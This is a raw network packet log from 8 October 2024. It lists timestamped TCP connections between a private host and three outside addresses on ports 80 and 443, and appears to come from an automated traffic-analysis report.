                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.551659107 CEST4916880192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.556684971 CEST8049168192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.556746006 CEST4916880192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.577609062 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.577640057 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.577677965 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.577713966 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.577713966 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.577725887 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.577749014 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.577799082 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.577816963 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.594966888 CEST49169443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.595016003 CEST44349169188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.595123053 CEST49169443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.595438004 CEST49170443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.595459938 CEST44349170188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.595618963 CEST49170443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.614546061 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.614578962 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.614666939 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.614675999 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.614712954 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.614901066 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.614928961 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.614964008 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.614990950 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.614996910 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.616117001 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.616147041 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.616183043 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.616197109 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.616257906 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.620697021 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.620738029 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.620788097 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.620795012 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.620985031 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.621706963 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.621737957 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.621781111 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.621795893 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.621872902 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.623301983 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.623337984 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.623435974 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.623495102 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.654002905 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.667402983 CEST49169443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.667424917 CEST44349169188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.667649031 CEST49170443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.667660952 CEST44349170188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.674922943 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.674953938 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.675008059 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.675014973 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.675029039 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.675035000 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.675050974 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.675086021 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.675086021 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.675097942 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.675446987 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.712052107 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.712101936 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.712182999 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.712193012 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.712203979 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.712246895 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.712248087 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.712248087 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.712419033 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.712423086 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.712447882 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.714703083 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.714724064 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.714766979 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.714792013 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.714802980 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.714948893 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.717560053 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.717586040 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.717648983 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.717648983 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.717664003 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.717674017 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.718879938 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.718900919 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.718951941 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.718951941 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.718960047 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.719011068 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.719233990 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.719260931 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.719317913 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.719326973 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.719341040 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.719341040 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.761248112 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.761285067 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.761363029 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.761363029 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.761374950 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.761487007 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.764339924 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.764377117 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.764408112 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.764420033 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.764471054 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.764471054 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.799235106 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.799264908 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.799345970 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.799345970 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.799355984 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.799405098 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.799575090 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.799602032 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.799638033 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.799657106 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.799670935 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.799709082 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.801805973 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.801829100 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.801877022 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.801893950 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.802001953 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.805818081 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.805844069 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.805902004 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.805902004 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.805913925 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.805929899 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.806230068 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.806251049 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.806283951 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.806292057 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.806332111 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.806363106 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.806495905 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.806518078 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.806576967 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.806576967 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.806587934 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.806622982 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.862169981 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.862215996 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.862406969 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.862406969 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.862418890 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.863898993 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.863925934 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.863984108 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.863993883 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.864022970 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.864022970 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917587042 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917627096 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917686939 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917699099 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917717934 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917814016 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917839050 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917882919 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917891979 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917903900 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.919943094 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.919974089 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.920020103 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.920028925 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.920041084 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924489021 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924511909 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924595118 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924595118 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924602985 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924792051 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924817085 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924864054 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924869061 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924890041 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.925121069 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.925144911 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.925174952 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.925182104 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.925199986 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969588041 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969624043 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969696999 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969708920 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969753981 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969890118 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969932079 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969973087 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969976902 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969989061 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.985614061 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.004885912 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.004911900 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.004981995 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.004981995 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.004990101 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.005292892 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.005323887 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.005470037 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.005470037 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.005475998 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.007189989 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.007213116 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.007262945 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.007268906 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.007293940 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.007801056 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012229919 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012263060 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012317896 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012317896 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012324095 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012500048 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012531996 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012545109 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012562037 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012567043 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012594938 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012741089 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012895107 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012919903 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012978077 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012978077 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012983084 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.014060020 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056548119 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056583881 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056638956 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056649923 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056710958 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056858063 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056862116 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056874990 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056902885 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056958914 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056958914 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056965113 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.057092905 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.091881037 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.091918945 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.092005014 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.092020035 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.092062950 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.092081070 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.092103004 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.092134953 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.092135906 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.092156887 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.092163086 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.092259884 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.094316006 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.094350100 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.094412088 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.094412088 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.094417095 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.094480038 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.099158049 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.099188089 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.099261045 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.099261045 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.099267006 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.099675894 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.099704027 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.099749088 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.099754095 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.099769115 CEST49166443192.168.2.22207.241.227.242
